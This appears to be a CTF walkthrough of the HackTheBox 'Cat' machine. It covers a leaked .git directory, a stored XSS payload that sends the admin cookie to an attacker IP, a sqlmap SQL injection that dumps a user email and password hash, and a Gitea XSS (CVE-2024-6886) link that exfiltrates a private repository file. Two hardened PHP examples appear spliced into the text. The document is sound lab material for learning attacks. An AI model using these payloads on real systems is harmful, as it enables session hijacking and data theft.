HTB-Cat

Box Info

OS: Linux
Difficulty: Medium

Nmap

[root@kali] /home/kali  
❯ nmap cat.htb

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Dirsearch

A .git directory is exposed (Git leak).

The source code is retrieved with git-dumper:

[root@kali] /home/kali/Cat  
❯ git-dumper http://cat.htb/.git/ ./catgit  

XSS

view_cat.php shows a possible XSS.

<?php
session_start();

include 'config.php';

// Check if the user is logged in
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
    header("Location: /join.php");
    exit();
}

// Get the cat_id from the URL
$cat_id = isset($_GET['cat_id']) ? $_GET['cat_id'] : null;

if ($cat_id) {
    // Prepare and execute the query
    $query = "SELECT cats.*, users.username FROM cats JOIN users ON cats.owner_username = users.username WHERE cat_id = :cat_id";
    $statement = $pdo->prepare($query);
    $statement->bindParam(':cat_id', $cat_id, PDO::PARAM_INT);
    $statement->execute();

    // Fetch cat data from the database
    $cat = $statement->fetch(PDO::FETCH_ASSOC);

    if (!$cat) {
        die("Cat not found.");
    }
} else {
    die("Invalid cat ID.");
}
?>

<div class="container">
    <h1>Cat Details: <?php echo $cat['cat_name']; ?></h1>
    <img src="<?php echo $cat['photo_path']; ?>" alt="<?php echo $cat['cat_name']; ?>" class="cat-photo">
    <div class="cat-info">
        <strong>Name:</strong> <?php echo $cat['cat_name']; ?><br>
        <strong>Age:</strong> <?php echo $cat['age']; ?><br>
        <strong>Birthdate:</strong> <?php echo $cat['birthdate']; ?><br>
        <strong>Weight:</strong> <?php echo $cat['weight']; ?> kg<br>
        <strong>Owner:</strong> <?php echo $cat['username']; ?><br>
        <strong>Created At:</strong> <?php echo $cat['created_at']; ?>
    </div>
</div>

As can be seen, the owner's username is echoed straight into the page without encoding.

Upload any image through contest.php, then wait for the administrator to review it and leak their cookie.

So the injection point is the username chosen at registration:

<img src=1 onerror=this.src="http://10.10.xx.xx/?ccc="+encodeURIComponent(document.cookie)>

The listener receives the cookie.

Replacing our cookie with it gives access to the admin panel.
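The hardened counterpart of the rendering half of view_cat.php, as an added example that is not part of the write-up or the box's source: every value is encoded for the HTML context it lands in, and the photo path is validated instead of being echoed. The `uploads/` prefix, the placeholder image name and the sample row are assumptions.

```php
<?php
// Added example (not from the box's source): the rendering half of view_cat.php
// with output encoding, fed a constructed $cat row instead of the PDO query.
// Encoder for HTML text and quoted attributes; ENT_QUOTES covers both ' and ".
function e($value): string {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
// URL context: emit only a path of the expected shape, else a placeholder
// (the uploads/ prefix and placeholder file name are assumed).
function safe_photo_path(string $path): string {
    return preg_match('~^uploads/[A-Za-z0-9_-]+\.(png|jpe?g|gif)$~', $path)
        ? $path : 'img/placeholder.png';
}
function render_cat(array $cat): string {
    $name  = e($cat['cat_name']);
    $photo = e(safe_photo_path($cat['photo_path']));
    $age   = e($cat['age']);
    $born  = e($cat['birthdate']);
    $kg    = e($cat['weight']);
    $owner = e($cat['username']);
    $made  = e($cat['created_at']);
    return <<<HTML
<div class="container">
    <h1>Cat Details: {$name}</h1>
    <img src="{$photo}" alt="{$name}" class="cat-photo">
    <div class="cat-info">
        <strong>Name:</strong> {$name}<br>
        <strong>Age:</strong> {$age}<br>
        <strong>Birthdate:</strong> {$born}<br>
        <strong>Weight:</strong> {$kg} kg<br>
        <strong>Owner:</strong> {$owner}<br>
        <strong>Created At:</strong> {$made}
    </div>
</div>
HTML;
}
// Constructed row: the owner registered with markup in the username, the
// vector the write-up relies on. After encoding it is displayed, not executed.
$row = [
    'cat_name'   => 'Tom',
    'photo_path' => 'uploads/tom.jpg',
    'age'        => 3,
    'birthdate'  => '2021-05-01',
    'weight'     => 4.2,
    'username'   => '<img src=1 onerror=alert(1)>',
    'created_at' => '2024-01-01 10:00:00',
];
echo render_cat($row);
```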

SQL Injection

accept_cat.php builds the SQL statement by string concatenation; cat_name is not filtered at all.

<?php
include 'config.php';
session_start();

if (isset($_SESSION['username']) && $_SESSION['username'] === 'axel') {
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        if (isset($_POST['catId']) && isset($_POST['catName'])) {
            $cat_name = $_POST['catName'];
            $catId = $_POST['catId'];
            $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
            $pdo->exec($sql_insert);

            $stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
            $stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
            $stmt_delete->execute();

            echo "The cat has been accepted and added successfully.";
        } else {
            echo "Error: Cat ID or Cat Name not provided.";
        }
    } else {
        header("Location: /");
        exit();
    }
} else {
    echo "Access denied.";
}
?>

config.php shows that the database is SQLite.

<?php
// Database configuration
$db_file = '/databases/cat.db';

// Connect to the database
try {
    $pdo = new PDO("sqlite:$db_file");
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
    die("Error: " . $e->getMessage());
}
?>

So this is most likely a blind SQL injection.
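The accept step of accept_cat.php with the name passed as a bound parameter, as an added example that is not part of the write-up or the box's source; the session and request-method checks from the original are left out, and the in-memory SQLite schema is a constructed stand-in for /databases/cat.db.

```php
<?php
// Added example (not from the box's source): the accept step of accept_cat.php
// rewritten with bound parameters, run against an in-memory SQLite database
// (constructed fixture standing in for /databases/cat.db).
function accept_cat(PDO $pdo, string $catName, string $catId): void {
    // Reject anything but a positive integer id before it reaches SQL.
    if (!ctype_digit($catId)) {
        throw new InvalidArgumentException('catId must be a positive integer');
    }
    $pdo->beginTransaction();   // insert and delete succeed or fail together
    try {
        // The name travels as a bound value, never spliced into the SQL text,
        // so a quote inside it is stored literally instead of ending the string.
        $insert = $pdo->prepare('INSERT INTO accepted_cats (name) VALUES (:name)');
        $insert->bindValue(':name', $catName, PDO::PARAM_STR);
        $insert->execute();
        $delete = $pdo->prepare('DELETE FROM cats WHERE cat_id = :cat_id');
        $delete->bindValue(':cat_id', (int) $catId, PDO::PARAM_INT);
        $delete->execute();
        $pdo->commit();
    } catch (Throwable $e) {
        $pdo->rollBack();
        throw $e;
    }
}
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE cats (cat_id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec('CREATE TABLE accepted_cats (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO cats (cat_id, name) VALUES (1, 'Tom')");
// A name containing a quote and a comment marker: concatenated into the
// original statement it would change the query, bound it is plain data.
accept_cat($pdo, "Tom') -- ", '1');
// The stored name keeps its quote intact and the pending row is gone.
foreach ($pdo->query('SELECT name FROM accepted_cats') as $row) {
    echo 'accepted: ', $row['name'], PHP_EOL;
}
echo 'pending cats: ', $pdo->query('SELECT COUNT(*) FROM cats')->fetchColumn(), PHP_EOL;
```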

[root@kali] /home/kali/Cat/catgit (master) 
❯ sqlmap -u "http://cat.htb/accept_cat.php" --cookie="PHPSESSID=918f1nvps72fc7rvk5umu13jch" --data="catId=1&catName=123" -p catName --dbms=SQLite --level=5 

Four tables are dumped.

From the users table:

rosamendoza485@gmail.com      ac369922d560f17d6eeb8b2c7dec498c

(If nothing can be dumped, the box may need to be reset.)

Go to this website to crack it; I could not seem to crack it with rockyou.txt.

Log in to rosa's account with this password; there are several other users on the box.

Checking the Apache log gives axel's password:

rosa@cat:~$ cat /var/log/apache2/access.log | grep axel

Logging in as axel gives user.txt.

ROOT

Port 3000 is open internally.

Forwarding it out shows a Git service:

[root@kali] /home/kali  
❯ ssh  rosa@cat.htb -L 3000:127.0.0.1:3000

Its version is 1.22.0; I found a possibly applicable XSS vulnerability:

CVE-2024-6886

/var/mail/axel contains a message.

We need to send jobert an email; he will then check the repository, which triggers the XSS.

jobert should have access to the employee-management repository.

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?content='+encodeURIComponent(data)))">XSS test</a>

Since port 25 is bound to 127.0.0.1, it also has to be forwarded.

Send jobert the email with the following command:

[root@kali] /home/kali  
❯ swaks --to "jobert@localhost" --from "axel@localhost" --header "Click" --body "http://localhost:3000/axel/xss" --server localhost

URL-decoding the exfiltrated content gives the password.

This gives root.txt.

Summary

User: The Git leak gives the source code, which reveals a SQL injection that yields rosa's password. Because the site's login form submits via GET in plaintext, axel's password appears in the Apache access log, which gives user.txt.

Root: Forwarding the internal port 3000 leads to a CVE; the mail gives the clue that confirms it is an XSS. The employee-management repository cannot be accessed directly, so its contents are exfiltrated via the XSS, and the password is finally found in its index.php.
